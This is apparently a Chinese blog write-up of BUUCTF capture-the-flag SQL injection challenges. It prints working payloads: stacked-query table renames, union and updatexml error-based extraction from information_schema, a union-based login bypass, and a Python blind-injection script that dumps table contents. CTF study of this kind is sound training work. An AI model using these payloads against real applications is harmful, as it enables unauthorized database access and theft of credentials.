【buuctf】web SQL注入篇

| | | | 856

简单说明

1
记录buuctf web中SQL注入学习   简单题目未写

[强网杯 2019]随便注

1、万能密码注入

image-20210518194946967

1
2
3
4
5
1';rename table words to words2; 
rename table `1919810931114514` to `words`;
 alter table words change flag id varchar(100);
  show tables; 
  show columns from words;#

image-20210518200458235

[极客大挑战 2019]LoveSQL

1、万能密码注入

‘ or 1=1 #

image-20210518205129073

2、找字段

‘ order by 3 #

’ union select 1,2,3; # 找回显

1
2' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() #

3、爆表

image-20210518205534376

1
2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser' #

image-20210518205747038

1
2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #
1
2
3
2' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #

2' uunionnion sselectelect 1,2,group_concat(id,username,passwoordd) ffromrom l0ve1ysq1 #

image-20210518210415619

[极客大挑战 2019]HardSQL

1、用hackbar进行构造传参测试

image-20210519193037797

2、测试限制的传参

image-20210519193407564

image-20210519193346862

image-20210519193550883

3、爆库、爆表

1
2
3
http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(database()))),1))%23

image-20210519193647543

4、爆表

image-20210519194502176

1
2
3
http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))%23

5、爆字段

image-20210519194647159

1
2
3
http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))%23

image-20210519195854553

1
2
3
http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1))),1))%23

image-20210519200015966

1
2
3
4
5
http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(password)))from(H4rDsq1))),1))%23

左部分flag{dc3aeb0f-4601-4e42-96da-71

image-20210519200238582

1
2
3
4
5
6
7
8
http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1))),1))%23

左部分flag{dc3aeb0f-4601-4e42-96da-71
右部分数据f-4601-4e42-96da-718fe313ce10}
对比删去相同部分8fe313ce10}
flag{dc3aeb0f-4601-4e42-96da-718fe313ce10}

[GXYCTF2019]BabySQli

1、测试注入点

image-20210520144727337

2、发现源码里面有base32到base64的解密

image-20210520144925189

image-20210520144957880

1
2
select * from user where username = '$name'
判断有一个user表

3、Order by 找字段

image-20210520145102648

image-20210520145256523

4、用联合查询创建虚拟表进行登录

image-20210520145408128

image-20210520145445923

image-20210520145534170

1
2
3
name=1' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3'#&pw=admin

这里比较坑的就是md5加密没有提示

[极客大挑战 2019]FinalSQL

1、最后一题一般很难,上面提示了用盲注

image-20210522195040262

2、测试一下

image-20210522195136419

image-20210522195203898

image-20210522200249213

1
1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1

image-20210522200324873

手工注入太麻烦了,找了个网上的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
import time

url = "http://83091d3b-98bc-4cb3-857f-b7ff224e4257.node3.buuoj.cn/search.php?"
temp = {"id": ""}
column = ""
for i in range(1, 1000):
    time.sleep(0.06)
    low = 32
    high = 128
    mid = (low + high) // 2
    while (low < high):
        # 库名
        temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" %(i,mid)
        # 表名
        # temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1" %(i, mid)
        # 字段名
        # temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" %(i,mid)
        # 内容
        # temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" %(i,mid)
        r = requests.get(url, params=temp)
        time.sleep(0.04)
        print(low, high, mid, ":")
        if "Click" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if (mid == 32 or mid == 127):
        break
    column += chr(mid)
    print(column)

print("All:", column)

image-20210522201035981

1
2
结果:
All: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{15c4b1bf-0f2a-4b60-8063-07d6f687a332}

mochu7”||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name=’users’))),1))#

1
2
3
flag{06534856-955b-41e7-a415-933d31e2b3f4}
}4f3b2e13d339-514a-7e14-b559-65
3d31e2b3f4}

本文标题:【buuctf】web SQL注入篇

文章作者:孤桜懶契

发布时间:2021年05月19日 - 09:23:14

最后更新:2021年10月20日 - 13:22:06

原始链接:https://gylq.gitee.io/posts/73.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️